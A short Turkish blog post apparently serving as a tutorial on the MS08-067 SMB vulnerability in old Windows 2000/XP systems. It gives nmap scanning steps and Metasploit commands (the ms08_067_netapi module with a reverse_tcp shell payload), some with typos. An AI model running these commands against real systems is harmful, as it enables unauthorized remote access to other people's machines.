Salı, Temmuz 27

MS08-067 Zafiyeti Ve Sömürülmesi


Genelde 2000li windows Serverlarda ve xp makinalarda bulunur.
SMB üzerine yazılmış bir exploittir.
Bu zafiyeti tespit etmek için sistem üzerine bilindik bir nmap taraması yapabiliriz.

usr/share/nmap/scripts/
-ls | grap “ms08”
karşımıza çıkan scripti kopyalıyoruz ve
nmap –scripts script adı ip adresi -p445 ile(www.sechunterz.pw)sistemde tarama yaptırıyoruz ve zafiyetin olduğunu gözlemliyoruz.
daha sonra msfconsole’dan
use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/reverse_tcp
Gerekli tüm ayarlamaları yaptıktan sonra run diyerek exploiti başlatıyoruz.

0 comments:

Yorum Gönder